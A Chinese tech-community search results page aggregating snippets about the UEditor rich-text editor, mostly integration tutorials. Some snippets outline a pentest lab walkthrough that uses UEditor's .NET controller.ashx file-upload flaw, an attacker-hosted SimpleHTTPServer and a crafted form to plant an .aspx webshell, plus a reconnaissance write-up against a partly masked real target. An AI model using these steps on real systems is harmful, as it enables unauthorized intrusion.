首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

Ueditor漏洞捡漏

Ueditor漏洞捡漏到github上下载https://github.com/fex-team/ueditor下载完成后把压缩包解压后重命名为ueditor,新建一个目录,把 ueditor 放到 test...这个文件夹添加network service用户的权限即可解决搭建完成访问首页,会出现如图403的页面常规的目录扫描访问login.html为简单的登陆页面,这个点是用来混淆视线的,直接跳过但我们可以看到目录扫描ueditor...下存在以下页面,可以联想到ueditor getshell/ueditor/net/controller.ashx?...,在该目录下开启http服务 python -m SimpleHTTPServer 8080构造上传表单填入以下地址<form action="http://192.168.121.189:8081/<em>ueditor</em>...aspx上传后的路径为/<em>ueditor</em>/net/upload/image/20221026/6380239109238730544736443.aspx这时候可能会以为结束了,但是再次访问发现webshell

90020
您找到你想要的搜索结果了吗?
是的
没有找到

springboot集成ueditor富文本编辑器(不需修改ueditor源码)

(本人使用的是ueditor-JSP版) 本篇为在不修改UEditor源码的情况下集成的UEditor,如果需要修改UEditor源码的请戳这里 ☞springboot集成ueditor富文本编辑器(修改...ueditor源码)[推荐] 相关源码下载 UEditor-1.4.3.3 完整源码下载 UEditor-1.4.3.3 JSP版本源码下载 springboot+UEdiotr集成后项目源码(非修改.../ueditor.config.js">     <script type="text/javascript" charset="utf-8" src="/<em>ueditor</em>/<em>ueditor</em>.all.min.js...后端配置项未加载.png 5 引入<em>UEditor</em>相关的依赖 <!... upfile) {         <em>Ueditor</em> <em>ueditor</em> = new <em>Ueditor</em>();         return <em>ueditor</em>;     } } 9 配置<em>ueditor</em>.config.js

4.7K20

Html引入百度富文本编辑器ueditor

在日常工作用,肯定有用到富文本编辑器的时候,富文本编辑器功能强大使用方便,我用的是百度富文本编辑器,首先需要下载好百度编辑器的demo, 然后创建ueditor.html文件,引入百度编辑器,然后在html.../ueditor.config.js"> <script type="text/javascript" charset="utf-8" src="<em>ueditor</em>/<em>ueditor</em>.all.min.js...<em>域名</em>下上传了一张图片),而需求不单单是要在这<em>域名</em>下展示,还需要可以在其它<em>域名</em>下展示,这时就会出现图片不存在的情况, 这是因为百度编辑器的配置文件中默认的上传路径是相对路径,也就是说上面上传的图片的地址是相对于当前的<em>域名</em>进行上传的...,只有在你上传的<em>域名</em>下可以展示,其它<em>域名</em>是显示不出来的, 如果要在另外一个<em>域名</em>上展示的话只需要修改配置文件为绝对路径就可以了,打开上面下载的demo,找到php/config.json文件,打开后你会看到...其中imageUrlPrefix这个属性加上<em>域名</em>即可:”imageUrlPrefix”: “http://www.xxx.com”, /* 图片访问路径前缀 */ 需要注意的是添加<em>域名</em>的时候必须带上

2.6K30

渗透测试-Ueditor漏洞捡漏

Ueditor漏洞捡漏 到github上下载 https://github.com/fex-team/ueditor 下载完成后把压缩包解压后重命名为ueditor,新建一个目录,把 ueditor...service用户的权限即可解决 搭建完成 访问首页,会出现如图403的页面 常规的目录扫描 访问login.html为简单的登陆页面,这个点是用来混淆视线的,直接跳过 但我们可以看到目录扫描ueditor...下存在以下页面,可以联想到ueditor getshell /ueditor/net/controller.ashx?...在该目录下开启http服务 python -m SimpleHTTPServer 8080 构造上传表单填入以下地址 <form action="http://192.168.121.189:8081/<em>ueditor</em>...aspx 上传后的路径为 /<em>ueditor</em>/net/upload/image/20221026/6380239109238730544736443.aspx 这时候可能会以为结束了,但是再次访问发现

1.6K30

一个IP Geteshll

信息收集 开局只有一个IP:103.xx.xx.99,基本信息如下: thinkphp 3.1.3 + iis 7.5 + php 5.4.28 + Windows Server 2008 R2 域名...通过ip得到很多子域,访问那些子域可以判断出都是同一个系统上的,主域为:9xx9.cn 域名备案主体:广州市xxx有限公司 主体备案域名还包含: www.xx.com www.xx.com.cn www.xx.com.cn...www.cbxxxa.com www.rxxea.cn www.cxx8.com.cn www.zxx8.cn 还有一个域名:gxxt.xxx.com ==> 这里后面随便输入什么都可以报错查看到路径.../可以访问到ueditor编辑器版本为1.4.3 访问about得到报错绝对路径 d:\wwwroot\wwww\wwwroot 并且得到thinkphp 3.1.3,也得到了后台地址/Login/login...1.4.3历史漏洞复现 后台爆破(验证码不刷新) ftp、mysql、rdp爆破 首先复现ueditor ueditor 1.4.3 php版本无法getshell,漏洞是存在net的 .net可以任意文件上传

7810

UEditor上传图片功能无法使用,提示:后端配置项没有正常加载,上传插件不能正常使用!

故障详情,UEditor报配置错误。 点击单图上传按钮,选择需要的图片以后,编辑器中就一直是一个loading的状态,文章中无法插入需要的图片了。...在没有确定是否是CDN造成的准确判断之下,我尝试断开了CDN,直接解析了域名,待生效后登录后台,发现插图功能恢复,最终验证了猜测。 既然是CDN造成的,无非就是因为回源的问题。...之前做过将博客的后台系统全部回源了,而UEditor只出现在后台上,并没有出现在前台。我就在想,也许是因为我把UEditor作为插件使用的,而我在静态资源路径配置方面,和后台视图路径并非一致。...接下来我就把UEditor的路径在阿里云CDN里面回源了,刷新后CDN缓存后再次尝试添加图片依然无效(这之前把域名解析切回到了CDN上)。...然后又接着将UEditor的配置文件ueditor.config.js和config.json等需要加载的做了文件回源。做完这一切之后,后台依然没有鸟我,还是报错。

3.3K20

PHPCMSV9深度整合百度编辑器ueditor

最近几天熬夜整合了ueditor 1.2.3,依然是亮点与BUG同样闪耀的ueditor,依然是深度整合PHPCMS V9。...ueditor官方网站:http://ueditor.baidu.com/ ueditor在线演示:http://ueditor.baidu.com/website/onlinedemo.html PHPCMS...2012年9月4日0时30分:整合ueditor1.2.3,新增图片上传水印控制、涂鸦、远程图片抓取、word图片转存等功能,修复PHPCMS V9后台管理启用二级域名引发的JS跨域问题,改进子标题显示...) 2012年6月2日22时50分:ueditor升级到1.2.1版本,新增了对远程抓取图片功能的整合(由于ueditor1.2.1改动较大,整合花了点时间,放出的晚了,请见谅,IE6下未测试,请用IE6...后台管理启用二级域名而引发的JS跨域问题 10.支持前台用户投稿和黄页新闻发布 上图片: ?

3.1K40

UEditor文档-JSP 使用说明

JSP 使用说明 1 背景 UEditor 1.4.0 版本对之前的配置方式进行了简化,具体请参见:后端请求规范,为了适应这次升级,JAVA 后台也进行了重写,跟之前的版本差别较大,升级的用户注意阅读本文档...本文档介绍 UEditor JAVA 后台的部署和配置说明。 注意:本文档仅适用于1.4.0之后的Java版UEditor。...2 先决条件 JDK 1.6+ Apache Tomcat 6.0+ UEditor 1.4.0+ 3 示例环境 3.1 软件版本信息 JDK 6u45 Tomcat 6.0.41 UEditor 1.4.3...压缩包至Tomcat的webapps目录下,最终,UEditor的安装路径为: D:\apache-tomcat-6.0.41\webapps\ueditor1_4_3-utf8-jsp\ 进入目录...在Eclipse中创建一个名为 ueditor1_4_3-utf8-jsp 的“Dynamic Web Project”项目。如下图所示: ? 解压下载的UEditor包到D盘根目录。

1.5K20
领券